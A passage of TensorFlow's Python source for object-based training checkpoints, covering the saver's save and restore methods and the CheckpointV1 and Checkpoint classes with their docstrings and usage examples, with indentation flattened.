training checkpoints, which will happen automatically if it was created
by `root_trackable` or one of its dependencies (via
`Trackable._add_variable`).
session: The session to evaluate variables in. Ignored when executing
eagerly. If not provided when graph building, the default session is
used.
options: Optional `tf.train.CheckpointOptions` object.
update_ckpt_state: Optional bool flag. Indiciate whether the internal
checkpoint state needs to be updated. Set this to True only if calling
from tf.train.Checkpoint.save() to enable updating the checkpoint state.
By default this is set to False, i.e., not updating checkpoint state.
Returns:
The full path to the checkpoint.
"""
options = options or checkpoint_options.CheckpointOptions()
feed_dict = {}
use_session = (not context.executing_eagerly() and
not ops.inside_function())
if checkpoint_number:
file_prefix = "%s-%d" % (file_prefix, checkpoint_number)
if use_session:
if self._object_graph_feed_tensor is None:
with ops.device("/cpu:0"):
self._object_graph_feed_tensor = constant_op.constant(
"", dtype=dtypes.string)
self._file_prefix_feed_tensor = constant_op.constant(
"", dtype=dtypes.string)
object_graph_tensor = self._object_graph_feed_tensor
file_prefix_tensor = self._file_prefix_feed_tensor
feed_dict[file_prefix_tensor] = file_prefix
else:
with ops.device("/cpu:0"):
file_prefix_tensor = ops.convert_to_tensor(
file_prefix, dtype=dtypes.string)
object_graph_tensor = None
if not tensor_util.is_tensor(file_prefix):
file_io.recursive_create_dir(os.path.dirname(file_prefix))
save_path, new_feed_additions = self._save_cached_when_graph_building(
file_prefix_tensor, object_graph_tensor, options, update_ckpt_state)
if new_feed_additions:
feed_dict.update(new_feed_additions)
if not use_session:
session = None
elif session is None:
session = get_session()
if session:
return session.run(save_path, feed_dict=feed_dict)
else:
return save_path
def restore(self, save_path, options=None):
"""Restore a training checkpoint.
Restores `root_trackable` and any objects that it tracks
(transitive). Either assigns values immediately if variables to restore have
been created already, or defers restoration until the variables are
created. Dependencies added to the `root_trackable` passed to the
constructor after this call will be matched if they have a corresponding
object in the checkpoint.
When building a graph, restorations are added to the graph but not run.
```python
saver = Saver(root)
saver.restore(path)
```
To ensure that loading is complete and no more deferred restorations will
take place, you can use the `assert_consumed()` method of the status object
returned by the `restore` call.
The assert will raise an exception unless every object was matched and all
checkpointed values have a matching variable object.
```python
saver = Saver(root)
saver.restore(path).assert_consumed()
```
When graph building, `assert_consumed()` indicates that all of the restore
ops which will be created for this checkpoint have been created. They can be
run via the `run_restore_ops()` function of the status object:
```python
saver.restore(path).assert_consumed().run_restore_ops()
```
If the checkpoint has not been consumed completely, then the list of restore
ops will grow as more objects are added to the dependency graph.
Name-based `tf.compat.v1.train.Saver` checkpoints can be loaded using this
method. There is no deferred loading, and names are used to match
variables. No restore ops are created/run until `run_restore_ops()` or
`initialize_or_restore()` are called on the returned status object, even
when executing eagerly. Re-encode name-based checkpoints using this
object-based `Saver.save` as soon as possible.
Args:
save_path: The path to the checkpoint, as returned by `save` or
`tf.train.latest_checkpoint`. If None (as when there is no latest
checkpoint for `tf.train.latest_checkpoint` to return), returns an
object which may run initializers for objects in the dependency graph.
If the checkpoint was written by the name-based
`tf.compat.v1.train.Saver`, names are used to match variables.
options: Optional `tf.train.CheckpointOptions` object.
Returns:
A load status object, which can be used to make assertions about the
status of checkpoint restoration and run initialization/restore ops
(of type `CheckpointLoadStatus`, or `InitializationOnlyStatus` if
`save_path` is `None`).
If `save_path` points to a name-based checkpoint, a `NameBasedSaverStatus`
object is returned which runs restore ops from a name-based saver.
Raises:
RuntimeError: When a checkpoint file saved by async checkpoint is not
available upon restore().
"""
options = options or checkpoint_options.CheckpointOptions()
if save_path is None:
return InitializationOnlyStatus(self._graph_view, ops.uid())
# Wait until the ongoing checkpoint to finish.
# TODO(chienchunh): Allow to load the file while other checkpoint events
# are still ongiing. Need to add timeout mechanism along
# with conditional variables to notify when the checkpoint
# file is ready.
global _ASYNC_CHECKPOINT_THREAD
if _ASYNC_CHECKPOINT_THREAD is not None:
_ASYNC_CHECKPOINT_THREAD.join()
reader = py_checkpoint_reader.NewCheckpointReader(save_path)
graph_building = not context.executing_eagerly()
if graph_building:
dtype_map = None
else:
dtype_map = reader.get_variable_to_dtype_map()
try:
object_graph_string = reader.get_tensor(base.OBJECT_GRAPH_PROTO_KEY)
except errors_impl.NotFoundError:
# The object graph proto does not exist in this checkpoint. Try the
# name-based compatibility mode.
restore_coordinator = _NameBasedRestoreCoordinator(
save_path=save_path,
dtype_map=dtype_map)
if not graph_building:
for existing_trackable in util.list_objects(self._graph_view):
# pylint: disable=protected-access
existing_trackable._maybe_initialize_trackable()
existing_trackable._name_based_restores.add(restore_coordinator)
existing_trackable._name_based_attribute_restore(restore_coordinator)
# pylint: enable=protected-access
return NameBasedSaverStatus(
restore_coordinator,
object_graph_view=self._graph_view)
if graph_building:
if self._file_prefix_placeholder is None:
with ops.device("/cpu:0"):
self._file_prefix_placeholder = constant_op.constant("model")
file_prefix_tensor = self._file_prefix_placeholder
file_prefix_feed_dict = {self._file_prefix_placeholder: save_path}
else:
with ops.device("/cpu:0"):
file_prefix_tensor = constant_op.constant(save_path)
file_prefix_feed_dict = None
object_graph_proto = (trackable_object_graph_pb2.TrackableObjectGraph())
object_graph_proto.ParseFromString(object_graph_string)
checkpoint = _CheckpointRestoreCoordinator(
object_graph_proto=object_graph_proto,
save_path=save_path,
save_path_tensor=file_prefix_tensor,
reader=reader,
restore_op_cache=self._restore_op_cache,
graph_view=self._graph_view,
options=options,
saveables_cache=self._saveables_cache)
base.CheckpointPosition(
checkpoint=checkpoint, proto_id=0).restore(self._graph_view.root)
# Attached dependencies are not attached to the root, so should be restored
# separately.
if self._graph_view.attached_dependencies:
for ref in self._graph_view.attached_dependencies:
if ref.name == "root":
# Root dependency is automatically added to attached dependencies --
# this can be ignored since it maps back to the root object.
continue
proto_id = None
# Find proto ID of attached dependency (if it is in the proto).
for proto_ref in object_graph_proto.nodes[0].children:
if proto_ref.local_name == ref.name:
proto_id = proto_ref.node_id
break
if proto_id in checkpoint.object_by_proto_id:
# Object has already been restored. This can happen when there's an
# indirect connection from the attached object to the root.
continue
if proto_id is None:
# Could not find attached dependency in proto.
continue
base.CheckpointPosition(
checkpoint=checkpoint, proto_id=proto_id).restore(ref.ref)
load_status = CheckpointLoadStatus(
checkpoint,
graph_view=self._graph_view,
feed_dict=file_prefix_feed_dict)
return load_status
def frozen_saver(root_trackable):
"""Creates a static `tf.compat.v1.train.Saver` from a trackable object.
The returned `Saver` saves object-based checkpoints, but these checkpoints
will no longer reflect structural changes to the object graph, only changes to
the values of `Variable`s added as dependencies of the root object before
`freeze` was called.
`restore` works on the returned `Saver`, but requires that the object graph of
the checkpoint being loaded exactly matches the object graph when `freeze` was
called. This is in contrast the object-based restore performed by
`tf.train.Checkpoint` which attempts a fuzzy matching between a checkpoint's
object graph and the current Python object graph.
Args:
root_trackable: A trackable object to save.
Returns:
A saver which saves object-based checkpoints for the object graph frozen at
the time `frozen_saver` was called.
"""
named_saveable_objects, registered_savers = (
util.frozen_saveables_and_savers(
graph_view_lib.ObjectGraphView(root_trackable)))
return functional_saver.MultiDeviceSaver(named_saveable_objects,
registered_savers)
def _assert_trackable(obj, name):
if not isinstance(
obj, (base.Trackable, def_function.Function)):
raise ValueError(
f"`Checkpoint` was expecting {name} to be a trackable object (an "
f"object derived from `Trackable`), got {obj}. If you believe this "
"object should be trackable (i.e. it is part of the "
"TensorFlow Python API and manages state), please open an issue.")
def _update_checkpoint_state_internal(file_path):
"""Update internal checkpoint state."""
checkpoint_management.update_checkpoint_state_internal(
save_dir=os.path.dirname(file_path),
model_checkpoint_path=file_path,
all_model_checkpoint_paths=[file_path],
save_relative_paths=True)
def _convert_file_name_tensor_to_string(tensor):
"""Convert file name tensor to string."""
output = tensor
if tensor_util.is_tf_type(output):
# Convert to numpy if not `tf.function` building.
if context.executing_eagerly():
output = compat.as_str(output.numpy())
else:
# Graph + Session, so we already session.ran it.
output = compat.as_str(output)
return output
# Mentions graph building / Sessions. The v2 version is below.
@tf_export(v1=["train.Checkpoint"])
class CheckpointV1(autotrackable.AutoTrackable):
"""Groups trackable objects, saving and restoring them.
`Checkpoint`'s constructor accepts keyword arguments whose values are types
that contain trackable state, such as `tf.compat.v1.train.Optimizer`
implementations, `tf.Variable`, `tf.keras.Layer` implementations, or
`tf.keras.Model` implementations. It saves these values with a checkpoint, and
maintains a `save_counter` for numbering checkpoints.
Example usage when graph building:
```python
import tensorflow as tf
import os
checkpoint_directory = "/tmp/training_checkpoints"
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
checkpoint = tf.train.Checkpoint(optimizer=optimizer, model=model)
status = checkpoint.restore(tf.train.latest_checkpoint(checkpoint_directory))
train_op = optimizer.minimize( ... )
status.assert_consumed() # Optional sanity checks.
with tf.compat.v1.Session() as session:
# Use the Session to restore variables, or initialize them if
# tf.train.latest_checkpoint returned None.
status.initialize_or_restore(session)
for _ in range(num_training_steps):
session.run(train_op)
checkpoint.save(file_prefix=checkpoint_prefix)
```
Example usage with eager execution enabled:
```python
import tensorflow as tf
import os
tf.compat.v1.enable_eager_execution()
checkpoint_directory = "/tmp/training_checkpoints"
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
checkpoint = tf.train.Checkpoint(optimizer=optimizer, model=model)
status = checkpoint.restore(tf.train.latest_checkpoint(checkpoint_directory))
for _ in range(num_training_steps):
optimizer.minimize( ... ) # Variables will be restored on creation.
status.assert_consumed() # Optional sanity checks.
checkpoint.save(file_prefix=checkpoint_prefix)
```
`Checkpoint.save` and `Checkpoint.restore` write and read object-based
checkpoints, in contrast to `tf.compat.v1.train.Saver` which writes and reads
`variable.name` based checkpoints. Object-based checkpointing saves a graph of
dependencies between Python objects (`Layer`s, `Optimizer`s, `Variable`s,
etc.) with named edges, and this graph is used to match variables when
restoring a checkpoint. It can be more robust to changes in the Python
program, and helps to support restore-on-create for variables when executing
eagerly. Prefer `tf.train.Checkpoint` over `tf.compat.v1.train.Saver` for new
code.
`Checkpoint` objects have dependencies on the objects passed as keyword
arguments to their constructors, and each dependency is given a name that is
identical to the name of the keyword argument for which it was created.
TensorFlow classes like `Layer`s and `Optimizer`s will automatically add
dependencies on their variables (e.g. "kernel" and "bias" for
`tf.keras.layers.Dense`). Inheriting from `tf.keras.Model` makes managing
dependencies easy in user-defined classes, since `Model` hooks into attribute
assignment. For example:
```python
class Regress(tf.keras.Model):
def __init__(self):
super(Regress, self).__init__()
self.input_transform = tf.keras.layers.Dense(10)
# ...
def call(self, inputs):
x = self.input_transform(inputs)
# ...
```
This `Model` has a dependency named "input_transform" on its `Dense` layer,
which in turn depends on its variables. As a result, saving an instance of
`Regress` using `tf.train.Checkpoint` will also save all the variables created
by the `Dense` layer.
When variables are assigned to multiple workers, each worker writes its own
section of the checkpoint. These sections are then merged/re-indexed to behave
as a single checkpoint. This avoids copying all variables to one worker, but
does require that all workers see a common filesystem.
While `tf.keras.Model.save_weights` and `tf.train.Checkpoint.save` save in the
same format, note that the root of the resulting checkpoint is the object the
save method is attached to. This means saving a `tf.keras.Model` using
`save_weights` and loading into a `tf.train.Checkpoint` with a `Model`
attached (or vice versa) will not match the `Model`'s variables. See the
[guide to training
checkpoints](https://www.tensorflow.org/guide/checkpoint) for
details. Prefer `tf.train.Checkpoint` over `tf.keras.Model.save_weights` for
training checkpoints.
Attributes:
save_counter: Incremented when `save()` is called. Used to number
checkpoints.
"""
def __init__(self, **kwargs):
"""Group objects into a training checkpoint.
Args:
**kwargs: Keyword arguments are set as attributes of this object, and are
saved with the checkpoint. Values must be trackable objects.
Raises:
ValueError: If objects in `kwargs` are not trackable.
"""
super(CheckpointV1, self).__init__()
global _END_TIME_OF_LAST_WRITE
with _END_TIME_OF_LAST_WRITE_LOCK:
if _END_TIME_OF_LAST_WRITE is None:
_END_TIME_OF_LAST_WRITE = time.time()
for k, v in sorted(kwargs.items(), key=lambda item: item[0]):
setattr(self, k, v)
if not isinstance(
getattr(self, k), (base.Trackable, def_function.Function)):
raise ValueError(
"`Checkpoint` was expecting a trackable object (an object "
f"derived from `Trackable`), got {v}. If you believe this "
"object should be trackable (i.e. it is part of the "
"TensorFlow Python API and manages state), please open an issue.")
self._save_counter = None # Created lazily for restore-on-create.
self._save_assign_op = None
self._saver = TrackableSaver(graph_view_lib.ObjectGraphView(self))
def _maybe_create_save_counter(self):
"""Create a save counter if it does not yet exist."""
if self._save_counter is None:
# Initialized to 0 and incremented before saving.
with ops.device("/cpu:0"):
# add_variable creates a dependency named "save_counter"; NoDependency
# prevents creating a second dependency named "_save_counter".
self._save_counter = data_structures.NoDependency(
add_variable(
self,
name="save_counter",
initializer=0,
dtype=dtypes.int64,
trainable=False))
def write(self, file_prefix, session=None):
"""Writes a training checkpoint.
The checkpoint includes variables created by this object and any
trackable objects it depends on at the time `Checkpoint.write()` is
called.
`write` does not number checkpoints, increment `save_counter`, or update the
metadata used by `tf.train.latest_checkpoint`. It is primarily intended for
use by higher level checkpoint management utilities. `save` provides a very
basic implementation of these features.
Args:
file_prefix: A prefix to use for the checkpoint filenames
(/path/to/directory/and_a_prefix).
session: The session to evaluate variables in. Ignored when executing
eagerly. If not provided when graph building, the default session is
used.
Returns:
The full path to the checkpoint (i.e. `file_prefix`).
"""
start_time = time.time()
output = self._saver.save(file_prefix=file_prefix, session=session)
end_time = time.time()
metrics.AddCheckpointWriteDuration(
api_label=_CHECKPOINT_V1,
microseconds=_get_duration_microseconds(start_time, end_time))
global _END_TIME_OF_LAST_WRITE
with _END_TIME_OF_LAST_WRITE_LOCK:
metrics.AddTrainingTimeSaved(
api_label=_CHECKPOINT_V1,
microseconds=_get_duration_microseconds(_END_TIME_OF_LAST_WRITE,
end_time))
_END_TIME_OF_LAST_WRITE = end_time
if tensor_util.is_tf_type(output):
# Convert to numpy if not `tf.function` building.
if context.executing_eagerly():
output = compat.as_str(output.numpy())
else:
# Graph + Session, so we already session.ran it.
output = compat.as_str(output)
metrics.RecordCheckpointSize(
api_label=_CHECKPOINT_V1, filesize=_get_checkpoint_size(output))
return output
@property
def save_counter(self):
"""An integer variable which starts at zero and is incremented on save.
Used to number checkpoints.
Returns:
The save counter variable.
"""
self._maybe_create_save_counter()
return self._save_counter
def save(self, file_prefix, session=None):
"""Saves a training checkpoint and provides basic checkpoint management.
The saved checkpoint includes variables created by this object and any
trackable objects it depends on at the time `Checkpoint.save()` is
called.
`save` is a basic convenience wrapper around the `write` method,
sequentially numbering checkpoints using `save_counter` and updating the
metadata used by `tf.train.latest_checkpoint`. More advanced checkpoint
management, for example garbage collection and custom numbering, may be
provided by other utilities which also wrap `write`
(`tf.train.CheckpointManager` for example).
Args:
file_prefix: A prefix to use for the checkpoint filenames
(/path/to/directory/and_a_prefix). Names are generated based on this
prefix and `Checkpoint.save_counter`.
session: The session to evaluate variables in. Ignored when executing
eagerly. If not provided when graph building, the default session is
used.
Returns:
The full path to the checkpoint.
"""
graph_building = not context.executing_eagerly()
if graph_building:
if ops.inside_function():
raise NotImplementedError(
"Calling tf.train.Checkpoint.save() from a function is not "
"supported, as save() modifies saving metadata in ways not "
"supported by TensorFlow Operations. Consider using "
"tf.train.Checkpoint.write(), a lower-level API which does not "
"update metadata. tf.train.latest_checkpoint and related APIs will "
"not see this checkpoint.")
if session is None:
session = get_session()
if self._save_counter is None:
# When graph building, if this is a new save counter variable then it
# needs to be initialized before assign_add. This is only an issue if
# restore() has not been called first.
session.run(self.save_counter.initializer)
if not graph_building or self._save_assign_op is None:
with ops.colocate_with(self.save_counter):
assign_op = self.save_counter.assign_add(1, read_value=True)
if graph_building:
self._save_assign_op = data_structures.NoDependency(assign_op)
if graph_building:
checkpoint_number = session.run(self._save_assign_op)
else:
checkpoint_number = assign_op.numpy()
file_path = self.write(
"%s-%d" % (file_prefix, checkpoint_number), session=session)
checkpoint_management.update_checkpoint_state_internal(
save_dir=os.path.dirname(file_prefix),
model_checkpoint_path=file_path,
all_model_checkpoint_paths=[file_path],
save_relative_paths=True)
return file_path
def restore(self, save_path):
"""Restore a training checkpoint.
Restores this `Checkpoint` and any objects it depends on.
When executing eagerly, either assigns values immediately if variables to
restore have been created already, or defers restoration until the variables
are created. Dependencies added after this call will be matched if they have
a corresponding object in the checkpoint (the restore request will queue in
any trackable object waiting for the expected dependency to be added).
When graph building, restoration ops are added to the graph but not run
immediately.
```python
checkpoint = tf.train.Checkpoint( ... )
checkpoint.restore(path)
```
To ensure that loading is complete and no more deferred restorations will
take place, you can use the `assert_consumed()` method of the status object
returned by `restore`.
The assert will raise an exception if any Python objects in the dependency
graph were not found in the checkpoint, or if any checkpointed values do not
have a matching Python object:
```python
checkpoint = tf.train.Checkpoint( ... )
checkpoint.restore(path).assert_consumed()
```
When graph building, `assert_consumed()` indicates that all of the restore
ops that will be created for this checkpoint have been created. They can be
run via the `run_restore_ops()` method of the status object:
```python
checkpoint.restore(path).assert_consumed().run_restore_ops()
```
If the checkpoint has not been consumed completely, then the list of restore
ops will grow as more objects are added to the dependency graph.
To check that all variables in the Python object have restored values from
checkpoint, use `assert_existing_objects_matched()`. This assertion is
useful when called after the variables in your graph have been created.
Name-based `tf.compat.v1.train.Saver` checkpoints can be loaded using this
method. Names are used to match variables. No restore ops are created/run
until `run_restore_ops()` or `initialize_or_restore()` are called on the
returned status object when graph building, but there is restore-on-creation
when executing eagerly. Re-encode name-based checkpoints using
`tf.train.Checkpoint.save` as soon as possible.
Args:
save_path: The path to the checkpoint, as returned by `save` or
`tf.train.latest_checkpoint`. If None (as when there is no latest
checkpoint for `tf.train.latest_checkpoint` to return), returns an
object which may run initializers for objects in the dependency graph.
If the checkpoint was written by the name-based
`tf.compat.v1.train.Saver`, names are used to match variables.
Returns:
A load status object, which can be used to make assertions about the
status of a checkpoint restoration and run initialization/restore ops.
The returned status object has the following methods:
* `assert_consumed()`:
Raises an exception if any variables are unmatched: either
checkpointed values which don't have a matching Python object or
Python objects in the dependency graph with no values in the
checkpoint. This method returns the status object, and so may be
chained with `initialize_or_restore` or `run_restore_ops`.
* `assert_existing_objects_matched()`:
Raises an exception if any existing Python objects in the dependency
graph are unmatched. Unlike `assert_consumed`, this assertion will
pass if values in the checkpoint have no corresponding Python
objects. For example a `tf.keras.Layer` object which has not yet been
built, and so has not created any variables, will pass this assertion
but will fail `assert_consumed`. Useful when loading part of a larger
checkpoint into a new Python program, e.g. a training checkpoint with
a `tf.compat.v1.train.Optimizer` was saved but only the state required
for inference is being loaded. This method returns the status object,
and so may be chained with `initialize_or_restore` or
`run_restore_ops`.
* `assert_nontrivial_match()`: Asserts that something aside from the root
object was matched. This is a very weak assertion, but is useful for
sanity checking in library code where objects may exist in the
checkpoint which haven't been created in Python and some Python
objects may not have a checkpointed value.
* `expect_partial()`: Silence warnings about incomplete checkpoint
restores. Warnings are otherwise printed for unused parts of the
checkpoint file or object when the `Checkpoint` object is deleted
(often at program shutdown).
* `initialize_or_restore(session=None)`:
When graph building, runs variable initializers if `save_path` is
`None`, but otherwise runs restore operations. If no `session` is
explicitly specified, the default session is used. No effect when
executing eagerly (variables are initialized or restored eagerly).
* `run_restore_ops(session=None)`:
When graph building, runs restore operations. If no `session` is
explicitly specified, the default session is used. No effect when
executing eagerly (restore operations are run eagerly). May only be
called when `save_path` is not `None`.
"""
start_time = time.time()
status = self._saver.restore(save_path=save_path)
# Create the save counter now so it gets initialized with other variables
# when graph building. Creating it earlier would lead to errors when using,
# say, train.Saver() to save the model before initializing it.
self._maybe_create_save_counter()
if isinstance(status, NameBasedSaverStatus):
status.add_to_optionally_restored(self.save_counter)
metrics.AddCheckpointReadDuration(
api_label=_CHECKPOINT_V1,
microseconds=_get_duration_microseconds(start_time, time.time()))
return status
@tf_export("train.Checkpoint", v1=[])
class Checkpoint(autotrackable.AutoTrackable):
"""Manages saving/restoring trackable values to disk.
TensorFlow objects may contain trackable state, such as `tf.Variable`s,
`tf.keras.optimizers.Optimizer` implementations, `tf.data.Dataset` iterators,
`tf.keras.Layer` implementations, or `tf.keras.Model` implementations.
These are called **trackable objects**.
A `Checkpoint` object can be constructed to save either a single or group of
trackable objects to a checkpoint file. It maintains a `save_counter` for
numbering checkpoints.
Example:
```python
model = tf.keras.Model(...)
checkpoint = tf.train.Checkpoint(model)
# Save a checkpoint to /tmp/training_checkpoints-{save_counter}. Every time
# checkpoint.save is called, the save counter is increased.
save_path = checkpoint.save('/tmp/training_checkpoints')
# Restore the checkpointed values to the `model` object.
checkpoint.restore(save_path)
```
Example 2:
```python
import tensorflow as tf
import os
checkpoint_directory = "/tmp/training_checkpoints"
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
# Create a Checkpoint that will manage two objects with trackable state,
# one we name "optimizer" and the other we name "model".
checkpoint = tf.train.Checkpoint(optimizer=optimizer, model=model)
status = checkpoint.restore(tf.train.latest_checkpoint(checkpoint_directory))
for _ in range(num_training_steps):
optimizer.minimize( ... ) # Variables will be restored on creation.
status.assert_consumed() # Optional sanity checks.
checkpoint.save(file_prefix=checkpoint_prefix)
```
`Checkpoint.save()` and `Checkpoint.restore()` write and read object-based
checkpoints, in contrast to TensorFlow 1.x's `tf.compat.v1.train.Saver` which
writes and
reads `variable.name` based checkpoints. Object-based checkpointing saves a
graph of dependencies between Python objects (`Layer`s, `Optimizer`s,
`Variable`s, etc.) with named edges, and this graph is used to match variables
when restoring a checkpoint. It can be more robust to changes in the Python
program, and helps to support restore-on-create for variables.
`Checkpoint` objects have dependencies on the objects passed as keyword
arguments to their constructors, and each dependency is given a name that is
identical to the name of the keyword argument for which it was created.
TensorFlow classes like `Layer`s and `Optimizer`s will automatically add
dependencies on their own variables (e.g. "kernel" and "bias" for
`tf.keras.layers.Dense`). Inheriting from `tf.keras.Model` makes managing
dependencies easy in user-defined classes, since `Model` hooks into attribute
assignment. For example:
```python
class Regress(tf.keras.Model):
def __init__(self):
super(Regress, self).__init__()
self.input_transform = tf.keras.layers.Dense(10)
# ...
def call(self, inputs):
x = self.input_transform(inputs)
# ...
```
This `Model` has a dependency named "input_transform" on its `Dense` layer,
which in turn depends on its variables. As a result, saving an instance of
`Regress` using `tf.train.Checkpoint` will also save all the variables created
by the `Dense` layer.
When variables are assigned to multiple workers, each worker writes its own
section of the checkpoint. These sections are then merged/re-indexed to behave
as a single checkpoint. This avoids copying all variables to one worker, but
does require that all workers see a common filesystem.
This function differs slightly from the Keras Model `save_weights` function.
`tf.keras.Model.save_weights` creates a checkpoint file with the name
specified in `filepath`, while `tf.train.Checkpoint` numbers the checkpoints,
using `filepath` as the prefix for the checkpoint file names. Aside from this,
`model.save_weights()` and `tf.train.Checkpoint(model).save()` are equivalent.
See the [guide to training
checkpoints](https://www.tensorflow.org/guide/checkpoint) for
details.
Attributes:
save_counter: Incremented when `save()` is called. Used to number
checkpoints.
"""
def __init__(self, root=None, **kwargs):
"""Creates a training checkpoint for a single or group of objects.
Args:
root: The root object to checkpoint. `root` may be a trackable object or
`WeakRef` of a trackable object.
**kwargs: Keyword arguments are set as attributes of this object, and are
saved with the checkpoint. All `kwargs` must be trackable objects, or a
nested structure of trackable objects (`list`, `dict`, or `tuple`).
Raises:
ValueError: If `root` or the objects in `kwargs` are not trackable. A
`ValueError` is also raised if the `root` object tracks different
objects from the ones listed in attributes in kwargs (e.g.
`root.child = A` and `tf.train.Checkpoint(root, child=B)` are
incompatible).
"""
super(Checkpoint, self).__init__()
global _END_TIME_OF_LAST_WRITE
with _END_TIME_OF_LAST_WRITE_LOCK:
if _END_TIME_OF_LAST_WRITE is None:
_END_TIME_OF_LAST_WRITE = time.time()
attached_dependencies = None
self._save_counter = None # Created lazily for restore-on-create.
self._save_assign_op = None
if root:
trackable_root = root() if isinstance(root, weakref.ref) else root
_assert_trackable(trackable_root, "root")
attached_dependencies = []
# All keyword arguments (including root itself) are set as children
# of root.
kwargs["root"] = root
trackable_root._maybe_initialize_trackable()
self._save_counter = data_structures.NoDependency(
trackable_root._lookup_dependency("save_counter"))
for k, v in sorted(kwargs.items(), key=lambda item: item[0]):
setattr(self, k, v)
# Call getattr instead of directly using v because setattr converts
# v to a Trackable data structure when v is a list/dict/tuple.
converted_v = getattr(self, k)
if isinstance(converted_v, weakref.ref):
converted_v = converted_v()
_assert_trackable(converted_v, k)
if root:
# Make sure that root doesn't already have dependencies with these names
child = trackable_root._lookup_dependency(k)
if child is None:
attached_dependencies.append(
base.WeakTrackableReference(k, converted_v))
elif child != converted_v:
raise ValueError(
f"Cannot create a Checkpoint with keyword argument {k} if "
f"root.{k} already exists.")
self._saver = TrackableSaver(
graph_view_lib.ObjectGraphView(
root if root else self,
attached_dependencies=attached_dependencies))
self._attached_dependencies = data_structures.NoDependency(
attached_dependencies)
def _maybe_create_save_counter(self):
"""Create a save counter if it does not yet exist."""
if self._save_counter is None:
# Initialized to 0 and incremented before saving.
with ops.device("/cpu:0"):
# add_variable creates a dependency named "save_counter"; NoDependency
# prevents creating a second dependency named "_save_counter".
self._save_counter = data_structures.NoDependency(
add_variable(
self,
name="save_counter",
initializer=0,
dtype=dtypes.int64,
trainable=False))
if self._attached_dependencies is not None:
self._attached_dependencies.append(
# Store a stronge reference to the `save_counter`, so that if the
# `Checkpoint` object is deleted, the `save_counter` does not get
# deleted immediately. (The LoadStatus object needs to indirectly
# reference the counter through the ObjectGraphView).
base.TrackableReference("save_counter", self._save_counter))
# When loading a checkpoint, the save counter is created after
# the checkpoint has been loaded, so it must be handled in a deferred
# manner.
if isinstance(self.root, weakref.ref):
root = self.root()
else:
root = self.root
restore = root._deferred_dependencies.pop("save_counter", ()) # pylint: disable=protected-access
if restore:
restore[0].restore(self._save_counter)
def write(self, file_prefix, options=None):
"""Writes a training checkpoint.
The checkpoint includes variables created by this object and any
trackable objects it depends on at the time `Checkpoint.write()` is
called.
`write` does not number checkpoints, increment `save_counter`, or update the
metadata used by `tf.train.latest_checkpoint`. It is primarily intended for
use by higher level checkpoint management utilities. `save` provides a very
basic implementation of these features.
Checkpoints written with `write` must be read with `read`.
Example usage:
```
step = tf.Variable(0, name="step")
checkpoint = tf.Checkpoint(step=step)
checkpoint.write("/tmp/ckpt")
# Later, read the checkpoint with read()
checkpoint.read("/tmp/ckpt")
# You can also pass options to write() and read(). For example this
# runs the IO ops on the localhost:
options = tf.CheckpointOptions(experimental_io_device="/job:localhost")
checkpoint.write("/tmp/ckpt", options=options)
# Later, read the checkpoint with read()
checkpoint.read("/tmp/ckpt", options=options)
```
Args:
file_prefix: A prefix to use for the checkpoint filenames
(/path/to/directory/and_a_prefix).
options: Optional `tf.train.CheckpointOptions` object.
Returns:
The full path to the checkpoint (i.e. `file_prefix`).
"""
if isinstance(file_prefix, os.PathLike):
file_prefix = os.fspath(file_prefix)
return self._write(file_prefix, options)
def _write(self, file_prefix, options=None, update_ckpt_state=False):
"""Internal method that implements Checkpoint.write().
Args:
file_prefix: A prefix to use for the checkpoint filenames
(/path/to/directory/and_a_prefix).
options: Optional `tf.train.CheckpointOptions` object.
update_ckpt_state: Optional bool flag. Indiciate whether the internal
checkpoint state needs to be updated.
Returns:
The full path to the checkpoint (i.e. `file_prefix`).
"""
# TODO(chienchunh): Figure out the better way to measure e2e checkpoint
# duration and checkpoint size for async checkpoint.
start_time = time.time()
options = options or checkpoint_options.CheckpointOptions()
output = self._saver.save(
file_prefix=file_prefix,
options=options,
update_ckpt_state=update_ckpt_state)
end_time = time.time()
metrics.AddCheckpointWriteDuration(
api_label=_CHECKPOINT_V2,
microseconds=_get_duration_microseconds(start_time, end_time))
global _END_TIME_OF_LAST_WRITE
with _END_TIME_OF_LAST_WRITE_LOCK:
metrics.AddTrainingTimeSaved(
api_label=_CHECKPOINT_V2,
microseconds=_get_duration_microseconds(_END_TIME_OF_LAST_WRITE,
end_time))
_END_TIME_OF_LAST_WRITE = end_time
# Convert the file path from tensor to string.
output = _convert_file_name_tensor_to_string(output)
# Async checkpoint may not have finished yet, so we can't measure its
# checkpoint size now.
if not options.experimental_enable_async_checkpoint:
metrics.RecordCheckpointSize(
api_label=_CHECKPOINT_V2, filesize=_get_checkpoint_size(output))
return output
@property
def save_counter(self):
"""An integer variable which starts at zero and is incremented on save.
Used to number checkpoints.
Returns:
The save counter variable.
"""
self._maybe_create_save_counter()
return self._save_counter
def save(self, file_prefix, options=None):
# pylint:disable=line-too-long
"""Saves a training checkpoint and provides basic checkpoint management.
The saved checkpoint includes variables created by this object and any
trackable objects it depends on at the time `Checkpoint.save()` is
called.
`save` is a basic convenience wrapper around the `write` method,
sequentially numbering checkpoints using `save_counter` and updating the
metadata used by `tf.train.latest_checkpoint`. More advanced checkpoint
management, for example garbage collection and custom numbering, may be
provided by other utilities which also wrap `write` and `read`.
(`tf.train.CheckpointManager` for example).
```
step = tf.Variable(0, name="step")
checkpoint = tf.train.Checkpoint(step=step)
checkpoint.save("/tmp/ckpt")
# Later, read the checkpoint with restore()
checkpoint.restore("/tmp/ckpt-1")
# You can also pass options to save() and restore(). For example this
# runs the IO ops on the localhost:
options = tf.train.CheckpointOptions(experimental_io_device="/job:localhost")
checkpoint.save("/tmp/ckpt", options=options)
# Later, read the checkpoint with restore()
checkpoint.restore("/tmp/ckpt-1", options=options)
```
Args:
file_prefix: A prefix to use for the checkpoint filenames
(/path/to/directory/and_a_prefix). Names are generated based on this
prefix and `Checkpoint.save_counter`.
options: Optional `tf.train.CheckpointOptions` object.
Returns:
The full path to the checkpoint.
"""
if isinstance(file_prefix, os.PathLike):
file_prefix = os.fspath(file_prefix)
# pylint:enable=line-too-long
options = options or checkpoint_options.CheckpointOptions()
graph_building = not context.executing_eagerly()
if graph_building:
# Assert that async checkpoint is not used for non-eager mode.
if options.experimental_enable_async_checkpoint:
raise NotImplementedError(
"Async checkpoint is not supported for non-eager mode. ")
if ops.inside_function():
raise NotImplementedError(
"Calling tf.train.Checkpoint.save() from a function is not "
"supported, as save() modifies saving metadata in ways not "
